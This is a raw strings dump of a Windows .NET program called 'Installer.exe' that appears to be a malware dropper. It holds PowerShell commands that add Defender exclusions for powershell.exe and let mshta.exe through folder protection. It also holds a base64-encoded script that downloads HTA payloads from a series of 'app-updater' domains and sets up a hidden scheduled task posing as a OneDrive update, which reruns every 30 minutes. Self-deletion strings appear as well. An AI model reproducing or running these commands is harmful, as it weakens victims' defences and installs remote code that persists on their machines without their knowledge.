!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
_VtblGap1_10
__StaticArrayInitTypeSize=240
<>9__4_0
<BytesToString>b__4_0
TASK_TRIGGER_CUSTOM_TRIGGER_01
_VtblGap1_1
_VtblGap2_1
IEnumerable`1
__StaticArrayInitTypeSize=32
Microsoft.Win32
_TASK_TRIGGER_TYPE2
_VtblGap1_2
_VtblGap2_2
Func`2
4C9B68754CC4C6A52C2871B90740059372385833
75848D0CB903E0BB85EFBA101DEA2CDDC4259773
_VtblGap1_3
_VtblGap1_14
_VtblGap2_14
3D3233E7A3B79CD1881DC32A47634BAB3D81D735
_VtblGap1_5
__StaticArrayInitTypeSize=16
E2EC565FBBFD88B08D58EB6A53B2886282E90B27
__StaticArrayInitTypeSize=128
__StaticArrayInitTypeSize=48
get_UTF8
_VtblGap2_8
2CC429832452134629F1F6D296EC8AEFB4E4D8A9
<Module>
<PrivateImplementationDetails>
D7419C1FEFE1C4B130903064A8B712B547EC94DA
TASK_RUNLEVEL_LUA
B9B59E27C8BB660E0B9671A51CBAC83E1416561B
TASK_ACTION_EXEC
AE724C64433159F90A98A611290E281D6E079C8D
GetTypeFromCLSID
TASK_LOGON_PASSWORD
TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD
973088729BBB7AE65DD87AC9E640D069358C1D4E
TASK_ACTION_SHOW_MESSAGE
TASK_TRIGGER_SESSION_STATE_CHANGE
TASK_TRIGGER_IDLE
TASK_TRIGGER_TIME
TASK_LOGON_NONE
_TASK_LOGON_TYPE
_TASK_ACTION_TYPE
42E95E9AF1F2AFF23067A0758B33B28DE272368F
_TASK_RUNLEVEL
TASK_ACTION_SEND_EMAIL
TASK_LOGON_INTERACTIVE_TOKEN
TASK_TRIGGER_LOGON
TASK_TRIGGER_REGISTRATION
TOKEN_ELEVATION
System.IO
TASK_LOGON_GROUP
TASK_ACTION_COM_HANDLER
TASK_TRIGGER_EVENT
TASK_LOGON_SERVICE_ACCOUNT
TASK_TRIGGER_BOOT
TASK_RUNLEVEL_HIGHEST
TASK_LOGON_S4U
set_IV
TASK_TRIGGER_MONTHLYDOW
TASK_TRIGGER_MONTHLY
TASK_TRIGGER_DAILY
TASK_TRIGGER_WEEKLY
TOKEN_QUERY
value__
mscorlib
System.Collections.Generic
UserId
Unload
TokenIsElevated
ReadToEnd
password
ITaskService
CreateInstance
set_Mode
PaddingMode
CryptoStreamMode
CipherMode
get_StartWhenAvailable
set_StartWhenAvailable
pStartWhenAvailable
IEnumerable
IDisposable
RuntimeFieldHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
TokenHandle
ProcessHandle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_FileName
set_FileName
serverName
DateTime
ValueType
LogonType
System.Core
Dispose
Create
DispIdAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
TypeIdentifierAttribute
CompilationRelaxationsAttribute
CoClassAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
SetValue
Installer.exe
SizeOf
set_Padding
Encoding
System.Runtime.Versioning
FromBase64String
UnloadString
BytesToString
GetString
Missing
get_Path
set_Path
GetFolderPath
TokenInformationLength
ReturnLength
FlushFinalBlock
IRegisteredTask
NewTask
Marshal
IPrincipal
get_Principal
set_Principal
ppPrincipal
get_Interval
set_Interval
pInterval
get_RunLevel
set_RunLevel
pRunLevel
advapi32.dll
kernel32.dll
CryptoStream
MemoryStream
Program
System
SymmetricAlgorithm
ICryptoTransform
get_Hidden
set_Hidden
pHidden
OpenProcessToken
domain
GetTokenInformation
get_Duration
set_Duration
pDuration
TokenElevation
IAction
IExecAction
System.Reflection
IActionCollection
ITriggerCollection
ITaskDefinition
RegisterTaskDefinition
pDefinition
get_Repetition
set_Repetition
ArgumentNullException
IRepetitionPattern
CopyTo
set_StartInfo
ProcessStartInfo
System.Linq
StreamReader
TextReader
ITaskFolder
SpecialFolder
GetFolder
ITrigger
ITimeTrigger
RightsChecker
MLInstaller
TaskScheduler
CurrentUser
get_TargetServer
IsProcessRunningAsAdministrator
Activator
Initializator
.cctor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
plainBytes
EncryptStringToBytes
GetBytes
get_Settings
set_Settings
ITaskSettings
ppSettings
get_Actions
set_Actions
ppActions
System.Collections
get_Triggers
set_Triggers
ppTriggers
RuntimeHelpers
TokenInformationClass
DesiredAccess
GetCurrentProcess
get_Arguments
set_Arguments
AddDays
Concat
ppRepeat
hObject
Select
Connect
WaitForExit
Environment
pArgument
Encrypt
pStart
Convert
System.Text
plainText
cipherText
get_Now
set_CreateNoWindow
InitializeArray
ToArray
set_Key
CreateSubKey
DeleteSubKey
RegistryKey
System.Security.Cryptography
DeleteCurrentFileStealthily
get_StartBoundary
set_StartBoundary
Registry
op_Inequality
IsNullOrEmpty
WrapNonExceptionThrows
Installer
Copyright
2025
$1a2f9219-f2e4-43ad-8a40-a59aba5b0520
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$BAE54997-48B1-4CBE-9965-D6BE263EBEA4
$02820E19-7B98-4ED2-B2E8-FDCCCEFF619B
$4C3D624D-FD6B-49A3-B9B7-09CB3CD3F047
$D98D51E5-C9B4-496A-A9C1-18980261CF0F
$9C86F320-DEE3-4DD1-B972-A303F26B061E
$7FB9ACF1-26BE-400E-85B5-294B9C75DFD6
$F5BC8FC5-536D-4F77-B852-FBC1356FDEB6
$8CFAC062-A080-4C15-9A88-AA7C2AF80DFC
TargetServer
$2FABA4C7-4DA9-4013-9697-20CC3FD40F85
$8FD4711D-2D02-4C8C-87E3-EFF699DE127E
$B45747E0-EBA7-4276-9F29-85C5BB300006
$09941815-EA89-4B5B-89E0-2A773801FAC3
$85DF5081-1B24-4F32-878A-D9D14DF4CB77
ZSystem.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
$e34cb9f1-c7f7-424c-be29-027dcc09363a TaskScheduler._TASK_ACTION_TYPE
$e34cb9f1-c7f7-424c-be29-027dcc09363a
TaskScheduler._TASK_LOGON_TYPE
$e34cb9f1-c7f7-424c-be29-027dcc09363a
TaskScheduler._TASK_RUNLEVEL
$e34cb9f1-c7f7-424c-be29-027dcc09363a!TaskScheduler._TASK_TRIGGER_TYPE2
_CorExeMain
mscoree.dll
?OwgZ-
P]1&{ W
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Set-MpPreference -ControlledFolderAccessAllowedApplications "
%systemroot%
\System32\mshta.exe"
Add-MpPreference -ExclusionProcess "
\System32\WindowsPowerShell\v1.0\powershell.exe"
-Command "
JHdjPU5ldy1PYmplY3QgTmV0LldlYkNsaWVudDtmb3JlYWNoKCRpIGluIDEuLjEwMDApeyR1cmw9Imh0dHBzOi8vYXBwLXVwZGF0ZXIkaS5hcHAvYXBpL2dldEZpbGU/Zm49
platon
Lmh0YSI7V3JpdGUtSG9zdCAkdXJsOyRyZXNwPSR3Yy5Eb3dubG9hZFN0cmluZygkdXJsKTtpZigkd2MuUmVzcG9uc2VIZWFkZXJzIC1hbmQgJHdjLlJlc3BvbnNlSGVhZGVyc1snQ29udGVudC1UeXBlJ10tZXEnYXBwbGljYXRpb24vaHRhJyl7YnJlYWt9fWlmKCR3Yy5SZXNwb25zZUhlYWRlcnMgLWFuZCAkd2MuUmVzcG9uc2VIZWFkZXJzWydDb250ZW50LVR5cGUnXS1lcSdhcHBsaWNhdGlvbi9odGEnKXskc3ZjPU5ldy1PYmplY3QgLUNvbSBTY2hlZHVsZS5TZXJ2aWNlOyRzdmMuQ29ubmVjdCgpOyR0YXNrPSRzdmMuTmV3VGFzaygwKTskdGFzay5SZWdpc3RyYXRpb25JbmZvLkRlc2NyaXB0aW9uPSdPbmVEcml2ZSBQZXItTWFjaGluZSBTdGFuZGFsb25lIFVwZGF0ZSc7JGFjdD0kdGFzay5BY3Rpb25zLkNyZWF0ZSgwKTskYWN0LlBhdGg9J21zaHRhLmV4ZSc7JGFjdC5Bcmd1bWVudHM9JHVybDskdHJnPSR0YXNrLlRyaWdnZXJzLkNyZWF0ZSgyKTskdHJnLlN0YXJ0Qm91bmRhcnk9KEdldC1EYXRlKS5BZGRNaW51dGVzKDEpLlRvU3RyaW5nKCdzJyk7JHRyZy5SZXBldGl0aW9uLkludGVydmFsPSdQVDMwTSc7JHRyZy5SZXBldGl0aW9uLkR1cmF0aW9uPSdQOTk5OUQnOyR0YXNrLlByaW5jaXBhbC5Vc2VySWQ9W1NlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZTskdGFzay5QcmluY2lwYWwuTG9nb25UeXBlPTM7JHN2Yy5HZXRGb2xkZXIoJ1wnKS5SZWdpc3RlclRhc2tEZWZpbml0aW9uKCdPbmVEcml2ZSBQ
0F87369F-A4E5-4CFC-BD3E-73E6154572DD
yyyy-MM-ddTHH:mm:ss
P9999D
/C timeout 1 && del "
cmd.exe
plainText
new byte[]{
cipherText
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Installer
FileVersion
1.0.0.0
InternalName
Installer.exe
LegalCopyright
Copyright
2025
LegalTrademarks
OriginalFilename
Installer.exe
ProductName
Installer
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0